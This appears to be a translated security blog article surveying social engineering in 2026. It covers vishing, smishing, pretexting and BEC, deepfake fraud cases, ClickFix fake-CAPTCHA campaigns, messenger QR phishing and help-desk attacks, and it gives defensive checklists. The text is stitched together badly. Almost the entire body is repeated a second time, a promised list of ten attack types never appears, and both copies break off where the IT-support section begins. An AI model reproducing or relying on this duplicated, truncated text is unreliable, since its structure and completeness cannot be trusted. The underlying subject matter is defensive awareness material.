For the first time, voice phishing has overtaken email as the leading initial access vector. According to Mandiant M-Trends 2026, classic phishing emails have fallen to 6% of confirmed initial penetration cases, while vishing has risen to 11% (up to 23% in cloud incidents). An average of 22 seconds elapses between the first call and the handover of access to the next group. Not minutes. Twenty-two seconds—and one conversation turns into a full-blown incident.
This article serves as a navigation hub for the entire topic of social engineering: from classic methods to techniques that have only become commonplace in the last year. Each section is an entry point from which to delve into a more detailed analysis.
What is social engineering and why will it dominate in 2026?
Social engineering isn't about hacking a system, but about hacking a person. An attacker isn't looking for a vulnerability in code. They're looking for the moment when an employee makes a bad decision: resetting a password over a phone call, sending a document in response to a manager's "urgent" request, or pasting a command into a terminal following instructions from a browser.
In MITRE ATT&CK, social engineering encompasses a whole cluster of techniques: from Phishing (T1566) and its subtechniques—Spearphishing Attachment (T1566.001), Spearphishing Link (T1566.002), Spearphishing via Service (T1566.003), and Spearphishing Voice (T1566.004)—to Phishing for Information (T1598) during the reconnaissance phase, Impersonation (T1656) to bypass security measures, and User Execution (T1204), when the victim executes malicious code.
Why do social engineering techniques work? According to Unit 42, 36% of all incidents investigated in 2025 began with social engineering. Firewalls, EDR, and SIEM are stronger than ever. But attackers don't need to breach them. Simply call the help desk and pose as an employee. Scattered Spider (UNC3944), according to the same M-Trends 2026 data, escalated to domain administrator status in less than 40 minutes after a single call to IT support – without a single malware launch.
The human factor in information security is a weak link not because people are stupid. Attacks fit into normal workflows: password resets, payment approvals, software updates. Every action appears routine. Each can become a point of compromise.
A detailed analysis of fundamental methods and protection: Social Engineering: Attack Methods and Practical Defense
10 Types of Social Engineering: A Complete Classification of Attacks on Humans
Types of social engineering have long since moved beyond the "Nigerian letters." Here is a systematic map of the methods relevant in 2026:
Each of these methods represents a distinct area of expertise. Below, I'll discuss the key areas, and for a deeper dive into specific techniques, use the navigation bar at the beginning of the article.
Phishing, Vishing, and Smishing: The Classic Triad Gains Voice
Phishing attacks are changing in 2026. According to statistics from the Anti-Phishing Working Group, 1,130,393 phishing attacks were recorded in the second quarter of 2025—a 13% increase compared to the previous quarter. According to Cofense, in 2024, phishing systems processed an average of one malicious email every 42 seconds.
But the main change isn't the number of emails, but the change in channel. Vishing—voice phishing—has become the dominant vector for the first time. Attackers call the help desk, pose as employees, and ask to reset an MFA token or unlock an account. The conversation lasts three to five minutes. No malware, no suspicious attachments—just a voice and a convincing cover story.
Smishing is developing in parallel. Employees receive SMS messages purportedly from a courier service, bank, or corporate system. The link leads to a cloned login portal. Filtering on mobile devices is significantly weaker than in corporate email, and users react more quickly—according to Verizon, the median time to click on a phishing link after opening the email is 21 seconds. Twenty-one seconds—and the account is no longer yours.
Recognition checklist (post next to the monitor):
Incoming call requesting a password reset or MFA - call back using the number in your corporate directory, not the one the caller provided.
SMS with a link from a "bank" or "delivery" - open the service through a browser tab, not the link in the message.
Email with an attachment from a familiar sender, but with an unusual style - confirm through an alternative channel.
Any request for confidential data with a sense of urgency - a verification pause is mandatory.
In Russia, according to Solar 4RAYS, in 2025, dozens of organizations received emails imitating notifications from the bailiff service, with the DarkWatchman RAT Trojan attached. A classic example of this is the fear of the "sovereign eye" that works flawlessly.
Pretexting and impersonation: why employees trust callers
Pretexting - the art of creating a legend. Unlike mass phishing, the attacker prepares a story in advance that will seem plausible to a specific victim. They research the company structure through LinkedIn and hh.ru, knowing the names of executives, project titles, and internal terminology.
In my experience conducting Red Team operations, the most effective pretexts were built on three elements: knowledge of the company's inner workings, the right tone of communication, and exploitation of the hierarchy. In Russian organizations, the last factor is devastating. The habit of following orders from "higher-ups" without question makes BEC (Business Email Compromise) attacks devastatingly effective.
According to the FBI IC3, cumulative losses from BEC attacks from 2013 to 2023 exceeded $55.4 billion globally. In 2024, there will be 21,442 complaints with losses exceeding $2.7 billion.
Impersonation as a technique (MITRE ATT&CK T1656) has expanded far beyond email. Attackers create cloned Telegram and WhatsApp accounts, spoof phone numbers via VoIP, and now generate the voice of a manager using AI. A typical Russian scenario: an accountant receives a message from the "CEO" in a messenger requesting urgent payment of a bill. The profile picture matches, the communication style is believable, and the note "Don't call, I'm in a meeting" blocks verification. It would be beautiful, if it weren't so sad.
If you're an accountant or a financial professional, there's only one rule: any transfer request over a set amount is confirmed by voicemail using a phone number from the corporate directory. Not from a message, not from an email signature – from the directory.
Deepfake and Generative AI: Deception Has Gone Industrial
Psychological manipulation in cybersecurity has reached a new level with the advent of accessible generative AI tools. The number of publicly available deepfake files has grown from 500,000 in 2023 to more than 8 million in 2025. This isn't a laboratory threat—it's a conveyor belt of deception.
Real-life cases documented in 2025:
Hong Kong, January 2025: Fraudsters cloned a financial manager's voice for a WhatsApp call. The victim transferred approximately 145 million Hong Kong dollars (~18.5 million USD) to fictitious crypto accounts. A single call.
CFO fraud via video call: Employees of a multinational company participated in a video conference where all participants, except the victim, were deepfake generations. Losses: $25.6 million (according to CNN). Imagine: you're at a meeting, everyone's a familiar face, everyone's a familiar voice—and it's all fake.
Voice biometrics bypass: Deepfake audio was used to bypass voice authentication in banking systems, enabling unauthorized transactions worth tens of millions.
The democratization of tools like ElevenLabs makes voice cloning accessible to anyone with a 30-second snippet of the victim's speech—a public speech, a podcast, or a LinkedIn video is enough.
But there's no need to panic about AI. Mandiant, in M-Trends 2026, puts it bluntly: 2025 wasn't the year hacks were the direct result of AI. The vast majority of successful breaches still occur due to trivial issues—weak identity verification, excessive privileges, and inconsistent MFA enforcement. AI makes social engineering faster and more convincing, but the vulnerabilities it exploits existed long before it.
A detailed analysis of deepfake attacks on identity systems: Bypassing KYC verification: deepfakes, injections, and social engineering in attacks on identity systems
ClickFix campaigns: 517% growth and the user as an execution engine
One of the most alarming trends for 2025–2026 is ClickFix attacks. According to Cloud Range, their volume increased by 517% in 2025. These campaigns do not use malicious attachments or exploit software vulnerabilities. They exploit the user's trust in the browser.
ClickFix attack scenario:
A user searches for something common—"Zoom installer," "Outlook login."
An advertising link or poisoned search results leads to a clone of a legitimate website.
The website displays a warning: "Suspicious activity detected" or a fake CAPTCHA.
The user is prompted to "fix the problem" by copying and pasting a command into the terminal.
The command runs a PowerShell script that installs a RAT.
Key feature: the user initiates code execution (MITRE ATT&CK T1204 - User Execution). Endpoint protection and web filters may not work because the action appears to be legitimate user activity. Essentially, the browser has replaced the inbox as the most exploited entry point.
Protection: Block PowerShell execution for non-administrative users via GPO. Set-ExecutionPolicy Restricted for user accounts is the first step. But even more importantly, this should be drilled into your head: no legitimate service will ever ask you to copy a command into the terminal. Never. If it does, it's an attack.
Multi-channel attacks and phishing via messaging apps
Social engineering in 2026 isn't a single channel. It's an orchestrated sequence of touchpoints across email, SMS, voice, messaging apps, and corporate platforms. A multi-channel approach builds the victim's trust at every stage.
A typical multi-channel attack unfolds in three stages:
Stage 1 - Initial contact via a trusted channel. A message in Slack or Teams from a "colleague" mentioning a real project. No links, no attachments - just context. Warming up.
Stage 2 - Follow-up via a second channel. A few minutes later, an email or call arrives referencing the first message. Cross-channel confirmation breaks skepticism. "Well, if it's in email and Slack, then it's real."
Stage 3 – credential collection or action. A link to a "corporate portal," a PDF invoice in a workspace, or a request to confirm identity. By this point, the victim has already "approved" the context through several points of contact.
In Russia, attacks via Telegram and WhatsApp pose a distinct threat. Hacking a messenger account and then sending messages to the victim's contacts is a common scenario. But APT groups operate more subtly: they use QR phishing to connect to accounts via linked devices, gaining constant access to correspondence without intercepting the password. Silent, clean, and without a trace.
A detailed look at APT group techniques in messaging apps: Phishing via messaging apps: How APT groups attack Telegram and Signal and what to do about it
Technical analysis of QR phishing in Signal: Hacking a Signal account via linked devices: Technical analysis of QR phishing by Russian APT groups
Attacks on IT support: 40 minutes to reach a domain admin without a single exploit
A separate category, which is rarely covered by Russian-language sources, is targeted social engineering attacks on internal IT processes. This is not phishing in the traditional sense. It is the exploitation of support procedures.
This article serves as a navigation hub for the entire topic of social engineering: from classic methods to techniques that have only become commonplace in the last year. Each section is an entry point from which to delve into a more detailed analysis.
What is social engineering and why will it dominate in 2026?
Social engineering isn't about hacking a system, but about hacking a person. An attacker isn't looking for a vulnerability in code. They're looking for the moment when an employee makes a bad decision: resetting a password over a phone call, sending a document in response to a manager's "urgent" request, or pasting a command into a terminal following instructions from a browser.
In MITRE ATT&CK, social engineering encompasses a whole cluster of techniques: from Phishing (T1566) and its subtechniques—Spearphishing Attachment (T1566.001), Spearphishing Link (T1566.002), Spearphishing via Service (T1566.003), and Spearphishing Voice (T1566.004)—to Phishing for Information (T1598) during the reconnaissance phase, Impersonation (T1656) to bypass security measures, and User Execution (T1204), when the victim executes malicious code.
Why do social engineering techniques work? According to Unit 42, 36% of all incidents investigated in 2025 began with social engineering. Firewalls, EDR, and SIEM are stronger than ever. But attackers don't need to breach them. Simply call the help desk and pose as an employee. Scattered Spider (UNC3944), according to the same M-Trends 2026 data, escalated to domain administrator status in less than 40 minutes after a single call to IT support – without a single malware launch.
The human factor in information security is a weak link not because people are stupid. Attacks fit into normal workflows: password resets, payment approvals, software updates. Every action appears routine. Each can become a point of compromise.
A detailed analysis of fundamental methods and protection: Social Engineering: Attack Methods and Practical Defense
10 Types of Social Engineering: A Complete Classification of Attacks on Humans
Types of social engineering have long since moved beyond the "Nigerian letters." Here is a systematic map of the methods relevant in 2026:
Each of these methods represents a distinct area of expertise. Below, I'll discuss the key areas, and for a deeper dive into specific techniques, use the navigation bar at the beginning of the article.
Phishing, Vishing, and Smishing: The Classic Triad Gains Voice
Phishing attacks are changing in 2026. According to statistics from the Anti-Phishing Working Group, 1,130,393 phishing attacks were recorded in the second quarter of 2025—a 13% increase compared to the previous quarter. According to Cofense, in 2024, phishing systems processed an average of one malicious email every 42 seconds.
But the main change isn't the number of emails, but the change in channel. Vishing—voice phishing—has become the dominant vector for the first time. Attackers call the help desk, pose as employees, and ask to reset an MFA token or unlock an account. The conversation lasts three to five minutes. No malware, no suspicious attachments—just a voice and a convincing cover story.
Smishing is developing in parallel. Employees receive SMS messages purportedly from a courier service, bank, or corporate system. The link leads to a cloned login portal. Filtering on mobile devices is significantly weaker than in corporate email, and users react more quickly—according to Verizon, the median time to click on a phishing link after opening the email is 21 seconds. Twenty-one seconds—and the account is no longer yours.
Recognition checklist (post next to the monitor):
Incoming call requesting a password reset or MFA - call back using the number in your corporate directory, not the one the caller provided.
SMS with a link from a "bank" or "delivery" - open the service through a browser tab, not the link in the message.
Email with an attachment from a familiar sender, but with an unusual style - confirm through an alternative channel.
Any request for confidential data with a sense of urgency - a verification pause is mandatory.
In Russia, according to Solar 4RAYS, in 2025, dozens of organizations received emails imitating notifications from the bailiff service, with the DarkWatchman RAT Trojan attached. A classic example of this is the fear of the "sovereign eye" that works flawlessly.
Pretexting and impersonation: why employees trust callers
Pretexting - the art of creating a legend. Unlike mass phishing, the attacker prepares a story in advance that will seem plausible to a specific victim. They research the company structure through LinkedIn and hh.ru, knowing the names of executives, project titles, and internal terminology.
In my experience conducting Red Team operations, the most effective pretexts were built on three elements: knowledge of the company's inner workings, the right tone of communication, and exploitation of the hierarchy. In Russian organizations, the last factor is devastating. The habit of following orders from "higher-ups" without question makes BEC (Business Email Compromise) attacks devastatingly effective.
According to the FBI IC3, cumulative losses from BEC attacks from 2013 to 2023 exceeded $55.4 billion globally. In 2024, there will be 21,442 complaints with losses exceeding $2.7 billion.
Impersonation as a technique (MITRE ATT&CK T1656) has expanded far beyond email. Attackers create cloned Telegram and WhatsApp accounts, spoof phone numbers via VoIP, and now generate the voice of a manager using AI. A typical Russian scenario: an accountant receives a message from the "CEO" in a messenger requesting urgent payment of a bill. The profile picture matches, the communication style is believable, and the note "Don't call, I'm in a meeting" blocks verification. It would be beautiful, if it weren't so sad.
If you're an accountant or a financial professional, there's only one rule: any transfer request over a set amount is confirmed by voicemail using a phone number from the corporate directory. Not from a message, not from an email signature – from the directory.
Deepfake and Generative AI: Deception Has Gone Industrial
Psychological manipulation in cybersecurity has reached a new level with the advent of accessible generative AI tools. The number of publicly available deepfake files has grown from 500,000 in 2023 to more than 8 million in 2025. This isn't a laboratory threat—it's a conveyor belt of deception.
Real-life cases documented in 2025:
Hong Kong, January 2025: Fraudsters cloned a financial manager's voice for a WhatsApp call. The victim transferred approximately 145 million Hong Kong dollars (~18.5 million USD) to fictitious crypto accounts. A single call.
CFO fraud via video call: Employees of a multinational company participated in a video conference where all participants, except the victim, were deepfake generations. Losses: $25.6 million (according to CNN). Imagine: you're at a meeting, everyone's a familiar face, everyone's a familiar voice—and it's all fake.
Voice biometrics bypass: Deepfake audio was used to bypass voice authentication in banking systems, enabling unauthorized transactions worth tens of millions.
The democratization of tools like ElevenLabs makes voice cloning accessible to anyone with a 30-second snippet of the victim's speech—a public speech, a podcast, or a LinkedIn video is enough.
But there's no need to panic about AI. Mandiant, in M-Trends 2026, puts it bluntly: 2025 wasn't the year hacks were the direct result of AI. The vast majority of successful breaches still occur due to trivial issues—weak identity verification, excessive privileges, and inconsistent MFA enforcement. AI makes social engineering faster and more convincing, but the vulnerabilities it exploits existed long before it.
A detailed analysis of deepfake attacks on identity systems: Bypassing KYC verification: deepfakes, injections, and social engineering in attacks on identity systems
ClickFix campaigns: 517% growth and the user as an execution engine
One of the most alarming trends for 2025–2026 is ClickFix attacks. According to Cloud Range, their volume increased by 517% in 2025. These campaigns do not use malicious attachments or exploit software vulnerabilities. They exploit the user's trust in the browser.
ClickFix attack scenario:
A user searches for something common—"Zoom installer," "Outlook login."
An advertising link or poisoned search results leads to a clone of a legitimate website.
The website displays a warning: "Suspicious activity detected" or a fake CAPTCHA.
The user is prompted to "fix the problem" by copying and pasting a command into the terminal.
The command runs a PowerShell script that installs a RAT.
Key feature: the user initiates code execution (MITRE ATT&CK T1204 - User Execution). Endpoint protection and web filters may not work because the action appears to be legitimate user activity. Essentially, the browser has replaced the inbox as the most exploited entry point.
Protection: Block PowerShell execution for non-administrative users via GPO. Set-ExecutionPolicy Restricted for user accounts is the first step. But even more importantly, this should be drilled into your head: no legitimate service will ever ask you to copy a command into the terminal. Never. If it does, it's an attack.
Multi-channel attacks and phishing via messaging apps
Social engineering in 2026 isn't a single channel. It's an orchestrated sequence of touchpoints across email, SMS, voice, messaging apps, and corporate platforms. A multi-channel approach builds the victim's trust at every stage.
A typical multi-channel attack unfolds in three stages:
Stage 1 - Initial contact via a trusted channel. A message in Slack or Teams from a "colleague" mentioning a real project. No links, no attachments - just context. Warming up.
Stage 2 - Follow-up via a second channel. A few minutes later, an email or call arrives referencing the first message. Cross-channel confirmation breaks skepticism. "Well, if it's in email and Slack, then it's real."
Stage 3 – credential collection or action. A link to a "corporate portal," a PDF invoice in a workspace, or a request to confirm identity. By this point, the victim has already "approved" the context through several points of contact.
In Russia, attacks via Telegram and WhatsApp pose a distinct threat. Hacking a messenger account and then sending messages to the victim's contacts is a common scenario. But APT groups operate more subtly: they use QR phishing to connect to accounts via linked devices, gaining constant access to correspondence without intercepting the password. Silent, clean, and without a trace.
A detailed look at APT group techniques in messaging apps: Phishing via messaging apps: How APT groups attack Telegram and Signal and what to do about it
Technical analysis of QR phishing in Signal: Hacking a Signal account via linked devices: Technical analysis of QR phishing by Russian APT groups
Attacks on IT support: 40 minutes to reach a domain admin without a single exploit
A separate category, which is rarely covered by Russian-language sources, is targeted social engineering attacks on internal IT processes. This is not phishing in the traditional sense. It is the exploitation of support procedures.
